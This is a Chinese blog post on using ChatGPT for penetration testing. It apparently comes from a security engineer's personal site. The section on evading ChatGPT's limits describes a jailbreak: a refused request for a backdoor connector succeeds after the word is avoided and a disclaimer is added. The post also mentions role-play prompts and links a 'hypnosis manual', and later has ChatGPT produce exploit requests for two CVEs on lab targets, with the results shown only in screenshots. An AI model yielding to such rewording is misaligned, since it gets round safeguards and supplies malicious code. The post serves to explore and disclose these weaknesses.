<!DOCTYPE html>
<html lang=zh>
<head>
    <meta charset="utf-8">
    
    <title>奇点遗民————关于chatgpt以及其类似AI在渗透中的应用与思考 | CiaoFox</title>
    
    
        <meta name="keywords" content="安全运营,未完成" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="22年与23年交界时候chatgpt以席卷一切的姿态降临这个世界，事实上整个22年下半年AI这个词的出现频率都在提高，AI绘画，chatgpt...我能感受到某些东西出现在地平线上，但我并不确定它们是好是坏。标题是我最近在看的刘宇昆的短篇故事，我觉得这个名字很适合在未来回顾这篇文章。">
<meta property="og:type" content="article">
<meta property="og:title" content="奇点遗民————关于chatgpt以及其类似AI在渗透中的应用与思考">
<meta property="og:url" content="http://ciaofox.me/2023/02/16/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/%E5%A5%87%E7%82%B9%E9%81%97%E6%B0%91%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E5%85%B3%E4%BA%8Echatgpt%E4%BB%A5%E5%8F%8A%E5%85%B6%E7%B1%BB%E4%BC%BCAI%E5%9C%A8%E6%B8%97%E9%80%8F%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8%E4%B8%8E%E6%80%9D%E8%80%83/index.html">
<meta property="og:site_name" content="CiaoFox">
<meta property="og:description" content="22年与23年交界时候chatgpt以席卷一切的姿态降临这个世界，事实上整个22年下半年AI这个词的出现频率都在提高，AI绘画，chatgpt...我能感受到某些东西出现在地平线上，但我并不确定它们是好是坏。标题是我最近在看的刘宇昆的短篇故事，我觉得这个名字很适合在未来回顾这篇文章。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2023/02/17/pmEiOc7LvkHI5bR.png">
<meta property="og:image" content="https://s2.loli.net/2023/02/17/TQXCFxeJGUhi12t.png">
<meta property="og:image" content="https://s2.loli.net/2023/02/17/JY217ecMRgCHsx4.png">
<meta property="og:image" content="https://s2.loli.net/2023/02/17/RrYTKjS9C4Lfy7B.png">
<meta property="og:image" content="https://s2.loli.net/2023/02/17/NJSxdi4MPbymh3Z.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/02/7KC2tga1RPnboZc.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/02/O5VxjQDfXoWZw72.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/fWrVwqyvotC6JD5.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/QYEmJ1CFK2nTRxN.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/FeSjMxVkRTAo73P.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/AJrPneRNC8qB1ma.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/udyqwAS2HYmGKNr.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/QEhJq9lpTBGkR6u.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/9C4vfVNhYQwJR3x.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/1THpWaikY57s9dy.png">
<meta property="og:image" content="https://s2.loli.net/2023/03/05/vmYjSQ9JHLhDuPa.png">
<meta property="article:published_time" content="2023-02-16T12:18:11.000Z">
<meta property="article:modified_time" content="2023-03-12T14:09:11.000Z">
<meta property="article:author" content="CiaoFox">
<meta property="article:tag" content="安全运营">
<meta property="article:tag" content="未完成">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2023/02/17/pmEiOc7LvkHI5bR.png">
    

    
        <link rel="alternate" href="/atom.xml" title="CiaoFox" type="application/atom+xml" />
    

    
        <link rel="icon" href="/favicon.ico" />
    

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/libs/open-sans/styles.css">

    
<link rel="stylesheet" href="/libs/source-code-pro/styles.css">


    
<link rel="stylesheet" href="/css/style.css">

    
<script src="/libs/jquery/2.1.3/jquery.min.js"></script>

    
<script src="/libs/jquery/plugins/cookie/1.4.1/jquery.cookie.js"></script>

    
    
        
<link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">

    
    
        
<link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">

    
    
    
    


    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
    <div id="container">
        <header id="header">
    <div id="header-main" class="header-inner">
        <div class="outer">
            <a href="/" id="logo">
                <i class="logo"></i>
                <span class="site-title">CiaoFox</span>
            </a>
            <nav id="main-nav">
                
                    <a class="main-nav-link" href="/">首页</a>
                
                    <a class="main-nav-link" href="/archives">时间线</a>
                
                    <a class="main-nav-link" href="/categories">分类</a>
                
                    <a class="main-nav-link" href="/tags">标签</a>
                
                    <a class="main-nav-link" href="/about">关于</a>
                
            </nav>
            
                
                <nav id="sub-nav">
                    <div class="profile" id="profile-nav">
                        <a id="profile-anchor" href="javascript:;">
                            <img class="avatar" src="/css/images/avatar.jpg" />
                            <i class="fa fa-caret-down"></i>
                        </a>
                    </div>
                </nav>
            
            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="搜索" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="想要查找什么..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div>
        </div>
    </div>
    <div id="main-nav-mobile" class="header-sub header-inner">
        <table class="menu outer">
            <tr>
                
                    <td><a class="main-nav-link" href="/">首页</a></td>
                
                    <td><a class="main-nav-link" href="/archives">时间线</a></td>
                
                    <td><a class="main-nav-link" href="/categories">分类</a></td>
                
                    <td><a class="main-nav-link" href="/tags">标签</a></td>
                
                    <td><a class="main-nav-link" href="/about">关于</a></td>
                
                <td>
                    
    <div class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="搜索" />
    </div>

                </td>
            </tr>
        </table>
    </div>
</header>

        <div class="outer">
            
                

<aside id="profile">
    <div class="inner profile-inner">
        <div class="base-info profile-block">
            <img id="avatar" src="/css/images/avatar.jpg" />
            <h2 id="name">ciaofox</h2>
            <h3 id="title">infosec engineer</h3>
            <span id="location"><i class="fa fa-map-marker"></i>New Eden</span>
            <a id="follow" target="_blank" href="https://github.com/ciaofox/">关注我</a>
        </div>
        <div class="article-info profile-block">
            <div class="article-info-block">
                32
                <span>文章</span>
            </div>
            <div class="article-info-block">
                12
                <span>标签</span>
            </div>
        </div>
        
        <div class="profile-block social-links">
            <table>
                <tr>
                    
                    
                    <td>
                        <a href="https://github.com/ciaofox/" target="_blank" title="github" class=tooltip>
                            <i class="fa fa-github"></i>
                        </a>
                    </td>
                    
                    <td>
                        <a href="/atom.xml" target="_blank" title="rss" class=tooltip>
                            <i class="fa fa-rss"></i>
                        </a>
                    </td>
                    
                </tr>
            </table>
        </div>
        
    </div>
</aside>

            
            
                <aside id="sidebar">
   
        
    <div class="widget-wrap" id='categories'>
        <h3 class="widget-title">
            <span>分类</span>
            &nbsp;
            <a id='allExpand' href="#">
                <i class="fa fa-angle-double-down fa-2x"></i>
            </a>
        </h3>
        
        
        
         <ul class="unstyled" id="tree" > 
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            400 Execution 攻击
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2018/10/31/400%20Execution%20%E6%94%BB%E5%87%BB/%E6%B8%97%E9%80%8F%E8%AE%B0%E5%BD%95%E4%B9%8B%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86/">渗透记录之路径遍历</a></li>  <li class="file"><a href="/2019/09/22/400%20Execution%20%E6%94%BB%E5%87%BB/PHPMyWind%E5%AD%98%E5%82%A8XSS%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2017-12984%EF%BC%89/">PHPMyWind存储XSS漏洞（CVE-2017-12984）</a></li>  <li class="file"><a href="/2019/10/11/400%20Execution%20%E6%94%BB%E5%87%BB/windows%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-0708%EF%BC%89/">windows远程桌面漏洞(CVE-2019-0708)</a></li>  <li class="file"><a href="/2020/03/03/400%20Execution%20%E6%94%BB%E5%87%BB/Apache%20Tomcat%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2020-1938%EF%BC%89/">Apache Tomcat文件包含漏洞（CVE-2020-1938）</a></li>  <li class="file"><a href="/2021/12/13/400%20Execution%20%E6%94%BB%E5%87%BB/%E9%9B%AA%E5%B4%A9-log4j%E6%BC%8F%E6%B4%9E%E7%B2%97%E8%B0%88/">雪崩-log4j漏洞粗谈</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            600 Privilege Escalation 权限提升
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2019/09/25/600%20Privilege%20Escalation%20%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Ubuntu%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%EF%BC%88CVE-2017-16995%EF%BC%89/">Ubuntu本地提权（CVE-2017-16995）</a></li>  <li class="file"><a href="/2022/03/10/600%20Privilege%20Escalation%20%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/DirtyPipe(CVE-2022-0847)/">DirtyPipe（CVE-2022-0847）</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            LeetCode
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2018/10/25/LeetCode/%E6%A8%A1%E6%9D%BF/">模板</a></li>  <li class="file"><a href="/2022/05/04/LeetCode/1.%20Two%20Sum/">1. Two Sum</a></li>  <li class="file"><a href="/2022/05/04/LeetCode/26.%20Remove%20Duplicates%20from%20Sorted%20Array/">26. Remove Duplicates from Sorted Array</a></li>  <li class="file"><a href="/2022/05/05/LeetCode/27.%20Remove%20Element/">27. Remove Element</a></li>  <li class="file"><a href="/2022/05/06/LeetCode/66.%20Plus%20One/">66. Plus One</a></li>  <li class="file"><a href="/2022/05/06/LeetCode/35.%20Search%20Insert%20Position/">35. Search Insert Position</a></li>  <li class="file"><a href="/2022/05/07/LeetCode/456.%20132%20Pattern/">456. 132 Pattern</a></li>  <li class="file"><a href="/2022/05/08/LeetCode/53.%20Maximum%20Subarray/">53. Maximum Subarray</a></li>  <li class="file"><a href="/2022/05/08/LeetCode/341.%20Flatten%20Nested%20List%20Iterator/">341. Flatten Nested List Iterator</a></li>  <li class="file"><a href="/2022/05/25/LeetCode/2248.%20Intersection%20of%20Multiple%20Arrays/">2248. Intersection of Multiple Arrays</a></li>  <li class="file"><a href="/2022/05/26/LeetCode/191.%20Number%20of%201%20Bits/">191. Number of 1 Bits</a></li>  <li class="file"><a href="/2022/05/27/LeetCode/1342.%20Number%20of%20Steps%20to%20Reduce%20a%20Number%20to%20Zero/">1342. Number of Steps to Reduce a Number to Zero</a></li>  <li class="file"><a href="/2022/05/29/LeetCode/268.%20Missing%20Number/">268. Missing Number</a></li>  <li class="file"><a href="/2022/05/30/LeetCode/463.%20Island%20Perimeter/">463. Island Perimeter</a></li>  <li class="file"><a href="/2022/05/31/LeetCode/1773.%20Count%20Items%20Matching%20a%20Rule/">1773. Count Items Matching a Rule</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            OSCP之路
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2022/08/23/OSCP%E4%B9%8B%E8%B7%AF/%E5%86%99%E5%9C%A8%E4%B8%80%E5%88%87%E4%B9%8B%E5%89%8D/">写在一切之前——关于OSCP|PEN-200</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            协议分析
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2018/10/16/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B9%8Bwireshark%E5%88%9D%E6%AC%A1%E6%8A%93%E5%8C%85/">协议分析之wireshark初次抓包</a></li>  <li class="file"><a href="/2018/10/25/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B9%8B%E6%B5%81%E9%87%8F%E6%8A%93%E5%8F%96/">协议分析之流量抓取</a></li>  <li class="file"><a href="/2018/11/27/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B9%8BPOP3%E5%8D%8F%E8%AE%AE/">协议分析之POP3协议与SMTP协议</a></li>  <li class="file"><a href="/2018/12/11/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B9%8BFTP%E5%8D%8F%E8%AE%AE/">协议分析之FTP协议</a></li>  <li class="file"><a href="/2018/12/25/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B9%8BMQTT%E5%8D%8F%E8%AE%AE/">协议分析之MQTT协议</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory open">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder-open"></i>
                            &nbsp;
                            安全运营
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/08/25/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/SOAR%EF%BC%8CSOC%E5%92%8C%E5%AE%89%E5%85%A8/">SOAR，SOC和安全</a></li>  <li class="file"><a href="/2022/05/20/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/%E5%B0%91%E6%95%B0%E6%B4%BE%E6%8A%A5%E5%91%8A-%E5%85%B3%E4%BA%8E%E5%9B%BA%E4%BB%B6%EF%BC%8C%E7%AD%89%E4%BF%9D%E4%B8%8E%E5%AE%89%E5%85%A8/">少数派报告-关于固件，等保与安全（未完待续）</a></li>  <li class="file active"><a href="/2023/02/16/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/%E5%A5%87%E7%82%B9%E9%81%97%E6%B0%91%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E5%85%B3%E4%BA%8Echatgpt%E4%BB%A5%E5%8F%8A%E5%85%B6%E7%B1%BB%E4%BC%BCAI%E5%9C%A8%E6%B8%97%E9%80%8F%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8%E4%B8%8E%E6%80%9D%E8%80%83/">奇点遗民————关于chatgpt以及其类似AI在渗透中的应用与思考</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            闲谈
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/08/23/%E9%97%B2%E8%B0%88/%E6%88%91%E4%B8%8D%E7%9F%A5%E9%81%93%E8%AF%A5%E8%AF%B4%E4%BB%80%E4%B9%88%EF%BC%8C%E5%85%B3%E4%BA%8E%E4%BE%A7%E9%80%9A%E9%81%93%E7%BC%93%E8%A7%A3%E8%BF%98%E6%98%AFside%20channel%20mitigations/">我不知道该说什么，关于侧通道缓解还是side channel mitigations</a></li>  </ul> 
                    </li> 
                     </ul> 
    </div>
    <script>
        $(document).ready(function() {
            var iconFolderOpenClass  = 'fa-folder-open';
            var iconFolderCloseClass = 'fa-folder';
            var iconAllExpandClass = 'fa-angle-double-down';
            var iconAllPackClass = 'fa-angle-double-up';
            // Handle directory-tree expansion:
            // 左键单独展开目录
            $(document).on('click', '#categories a[data-role="directory"]', function (event) {
                event.preventDefault();

                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var subtree = $(this).siblings('ul');
                icon.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if (expanded) {
                    if (typeof subtree != 'undefined') {
                        subtree.slideUp({ duration: 100 });
                    }
                    icon.addClass(iconFolderCloseClass);
                } else {
                    if (typeof subtree != 'undefined') {
                        subtree.slideDown({ duration: 100 });
                    }
                    icon.addClass(iconFolderOpenClass);
                }
            });
            // 右键展开下属所有目录
            $('#categories a[data-role="directory"]').bind("contextmenu", function(event){
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var listNode = $(this).siblings('ul');
                var subtrees = $.merge(listNode.find('li ul'), listNode);
                var icons = $.merge(listNode.find('.fa'), icon);
                icons.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if(expanded) {
                    subtrees.slideUp({ duration: 100 });
                    icons.addClass(iconFolderCloseClass);
                } else {
                    subtrees.slideDown({ duration: 100 });
                    icons.addClass(iconFolderOpenClass);
                }
            })
            // 展开关闭所有目录按钮
            $(document).on('click', '#allExpand', function (event) {
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconAllExpandClass);
                icon.removeClass(iconAllExpandClass).removeClass(iconAllPackClass);
                if(expanded) {
                    $('#sidebar .fa.fa-folder').removeClass('fa-folder').addClass('fa-folder-open')
                    $('#categories li ul').slideDown({ duration: 100 });
                    icon.addClass(iconAllPackClass);
                } else {
                    $('#sidebar .fa.fa-folder-open').removeClass('fa-folder-open').addClass('fa-folder')
                    $('#categories li ul').slideUp({ duration: 100 });
                    icon.addClass(iconAllExpandClass);
                }
            });  
        });
    </script>

    
        
    <div class="widget-wrap">
        <h3 class="widget-title"><span>标签</span></h3>
        <div class="widget">
            <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/LeetCode/" rel="tag">LeetCode</a><span class="tag-list-count">15</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OSCP/" rel="tag">OSCP</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/" rel="tag">协议分析</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90/" rel="tag">原理分析</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/" rel="tag">安全运营</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E/" rel="tag">提权漏洞</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag">文件上传</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9C%AA%E5%AE%8C%E6%88%90/" rel="tag">未完成</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">7</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86/" rel="tag">路径遍历</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/" rel="tag">远程代码执行</a><span class="tag-list-count">2</span></li></ul>
        </div>
    </div>

    
    <div id="toTop" class="fa fa-angle-up"></div>
</aside>
            
            <section id="main"><article id="post-安全运营/奇点遗民————关于chatgpt以及其类似AI在渗透中的应用与思考" class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <header class="article-header">
                
                    <div class="article-meta">
                        
    <div class="article-category">
    	<i class="fa fa-folder"></i>
        <a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/">安全运营</a>
    </div>

                        
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/" rel="tag">安全运营</a>, <a class="tag-link-link" href="/tags/%E6%9C%AA%E5%AE%8C%E6%88%90/" rel="tag">未完成</a>
    </div>

                        
    <div class="article-date">
        <i class="fa fa-calendar"></i>
        <a href="/2023/02/16/%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/%E5%A5%87%E7%82%B9%E9%81%97%E6%B0%91%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E5%85%B3%E4%BA%8Echatgpt%E4%BB%A5%E5%8F%8A%E5%85%B6%E7%B1%BB%E4%BC%BCAI%E5%9C%A8%E6%B8%97%E9%80%8F%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8%E4%B8%8E%E6%80%9D%E8%80%83/">
            <time datetime="2023-02-16T12:18:11.000Z" itemprop="datePublished">2023-02-16</time>
        </a>
    </div>


                        
                            <i class="fa fa-bar-chart"></i>
                            <span id="busuanzi_container_site_pv"><span id="busuanzi_value_page_pv"></span></span>    
                        
                        
                    </div>
                
                
    
        <h1 class="article-title" itemprop="name">
            奇点遗民————关于chatgpt以及其类似AI在渗透中的应用与思考
        </h1>
    

            </header>
        
        
        <div class="article-entry" itemprop="articleBody">
        
        
            
        
        
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>几个月前，关于chatgpt最多的问题是：“什么是chatgpt”，我在那时候没有动笔。而现在，关于chatgpt最多的问题是：“我们能用chatgpt做什么”。我想这个问题值得专门写一篇blog来讨论。当然，本文的重点不是chatgpt与改作业写论文发菜谱以及如何扮演一个猫娘…而是渗透。</p>
<p>注：本文中大部分交互内容都是中文，因为这篇blog中我会使用大量的诱导性语句来迫使chatgpt输出我想要内容，而中文作为我的母语我可以更流畅地把握对话。也许你可以用英文来交互以获得更好的回答，但我想本质内容不会有什么改变的。</p>
<h1 id="骗过chatgpt的道德和法律限制"><a href="#骗过chatgpt的道德和法律限制" class="headerlink" title="骗过chatgpt的道德和法律限制"></a>骗过chatgpt的道德和法律限制</h1><p><strong>chatgpt并非一成不变的。</strong></p>
<p>在chatgpt刚出现时候它几乎没有任何限制，你可以诱导甚至直接要求它说出种族歧视言论，进行色情对话或是<a target="_blank" rel="noopener" href="https://www.darkreading.com/attacks-breaches/attackers-are-already-exploiting-chatgpt-to-write-malicious-code">编写恶意代码</a>。这些大多哗众取宠的内容是其相关讨论中最外围但是也最吸引普通人目光的组成部分。但是在大概2个月之后，它<a target="_blank" rel="noopener" href="https://www.techrepublic.com/article/cybersecurity-blade-chatgpt-can-cut-both-ways/amp/">逐渐堵上了这些路</a>。现在的chatgpt依照其<a target="_blank" rel="noopener" href="https://platform.openai.com/docs/usage-policies/disallowed-usage">使用政策</a>会自动拒绝某些对话请求。但很显然，这些限制很容易翻越。</p>
<p>基于渗透技术的两面性，就如中国菜刀本身是作为网站后台管理工具反倒被用作后门连接工具一样，计算机无法判断一段程序会被运用在什么地方。当它创造一段自动触发的程序时它无法判断该程序是用作执剑人系统的自动按钮还是用在智能窗帘上。于是我们可以利用这些语言的小陷阱来迂回达成我们的目的。</p>
<p>下面我们来举一个例子：</p>
<p><img src="https://s2.loli.net/2023/02/17/pmEiOc7LvkHI5bR.png"></p>
<p>当我第一次提问时候，我直白地告诉它我需要一个后门的连接器，因为我预计到必然被拒绝所以我也没用心去描述技术要求。而结果也很明显，chatgpt果断地拒绝了我的请求。之后我尝试了多次，只要我提到这是一个“后门连接器”，它就会明确拒绝该请求。但只要稍微迂回一下，马奇诺防线就会失去作用。</p>
<p>同样需要注意的是：我第二次要求的后半部分，免责声明部分并非无关紧要。它决定了chatgpt对其的道德和法律判定。如果去掉的话，chatgpt依然会拒绝我的要求。</p>
<p><img src="https://s2.loli.net/2023/02/17/TQXCFxeJGUhi12t.png"></p>
<h1 id="who-I-am-关于prompt"><a href="#who-I-am-关于prompt" class="headerlink" title="who I am? (关于prompt)"></a>who I am? (关于prompt)</h1><p>世界上最本质的问题是：我是谁，我在哪，我要做什么。虽然chatgpt可以在不知道这些问题的情况下回答你的所有问题，但你肯定会希望它以一个你想要的身份对每个问题给出专业回答。实际上，除了告知chatgpt它所扮演的角色之外，我们还可以通过例如定义受众，格式化输出等方式来调整它输出的答案内容与格式。而这些修改的条件，我们称之为prompt（感觉中文里找不到对应的词）。</p>
<p>根据<a target="_blank" rel="noopener" href="https://the-decoder.com/chatgpt-guide-prompt-strategies/#chained-prompting">ChatGPT Guide: 7 prompt strategies for better output</a>，我们可以从里面学习到一些利用prompt来快速结构化输出并充分利用chatgpt潜能的方式。<del>而不是无尽地在里面问一堆政治问题和观点看法然后发知乎和公众号来博眼球与流量。</del> 在这篇文章中，我们更多是以对话的形式来与chatgpt交流并探讨其在渗透中的作用，所以参考文中的第一个技巧，<a target="_blank" rel="noopener" href="https://the-decoder.com/chatgpt-guide-prompt-strategies/#define-chatgpt%E2%80%99s-role">定义chatgpt的角色</a>非常重要。</p>
<p>从逻辑性来说，我们无法告诉它“我希望你扮演一个面试官”或是“我希望你扮演一个银河系搭车客指南”，这样的要求太过于宽泛。prompt是围栏，我们应该尽可能地利用它将chatgpt进行限制，</p>
<details> <summary>顺便说一下，让它扮猫娘以及类似的角色</summary>
效果如图

<p><img src="https://s2.loli.net/2023/02/17/JY217ecMRgCHsx4.png"></p>
<p>但是当你稍微越界时候，它会标红并提示无法满足要求。主要越界内容判定是基于其<a target="_blank" rel="noopener" href="https://platform.openai.com/docs/usage-policies/disallowed-usage">使用政策</a></p>
<p><img src="https://s2.loli.net/2023/02/17/RrYTKjS9C4Lfy7B.png"></p>
<p>如果我们让其扮演稍微合理一些的对象时它不会拒绝：</p>
<p><img src="https://s2.loli.net/2023/02/17/NJSxdi4MPbymh3Z.png"></p>
<p>附：<a target="_blank" rel="noopener" href="https://onetwo.ren/ChatGPT-Magic-Chat/#Index:Index">催眠手册</a></p>
</details>

<h1 id="渗透百科全书"><a href="#渗透百科全书" class="headerlink" title="渗透百科全书"></a>渗透百科全书</h1><p>得益于其强大的检索能力与整合能力，我们可以略过“花费巨量时间换三个不同的搜索引擎排除一万个csdn链接找到3篇blog漏洞复现文章其中只有一个靠谱的”这个过程。我们以漏洞复现或是CTF靶场为例展示一下chatgpt在渗透方面的强大能力：</p>
<p>靶场：<a target="_blank" rel="noopener" href="https://voluvulfocus.cn/">https://voluvulfocus.cn/</a></p>
<p>因为网络问题，我们尽可能地使用带有writeup的靶场进行验证，而不是实际进行验证（vulfocus的网络比我直连htb还痛苦）。</p>
<h2 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h2><p>本次使用的靶场为wordpress 文件下载 （CVE-2019-19985）</p>
<p><img src="https://s2.loli.net/2023/03/02/7KC2tga1RPnboZc.png"></p>
<p>vulfocus给的介绍实在是太少了，我们依靠这些信息很难判断出漏洞的具体情况，好在它给了漏洞编号，我们将该漏洞丢到chatgpt问问：</p>
<p><img src="https://s2.loli.net/2023/03/02/O5VxjQDfXoWZw72.png"></p>
<p>chatgpt很直接地给出了如何构造请求来读取文件。但是新的问题出现了，该请求并没有产生该产生的效果。于是我找到了<a target="_blank" rel="noopener" href="https://github.com/RandomRobbieBF/wordpress-exploits">该漏洞的POC</a>，并且再询问一次。</p>
<p><img src="https://s2.loli.net/2023/03/05/fWrVwqyvotC6JD5.png"></p>
<p>这次给出的请求和网上的该漏洞的POC是一致的。</p>
<p><img src="https://s2.loli.net/2023/03/05/QYEmJ1CFK2nTRxN.png"></p>
<p>迫于网络问题，我没法再复现这个漏洞，只能认为其可利用。</p>
<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><p>本次使用的靶场为xstream 反序列化 （CVE-2021-39144）</p>
<p>简单介绍：</p>
<p><img src="https://s2.loli.net/2023/03/05/FeSjMxVkRTAo73P.png"></p>
<p>如果我想要直接获取root权限：</p>
<p><img src="https://s2.loli.net/2023/03/05/AJrPneRNC8qB1ma.png"></p>
<p>如果我想要直接获取flag文件：</p>
<p><img src="https://s2.loli.net/2023/03/05/udyqwAS2HYmGKNr.png"></p>
<p>让我们比对一下writeup：</p>
<p><img src="https://s2.loli.net/2023/03/05/QEhJq9lpTBGkR6u.png"></p>
<p>这看起来基本一致，可能有能够优化的地方，但我们决定在这里终止。chatgpt证明了只要给出好的文本提示，它就能够提供可以运行的恶意代码。</p>
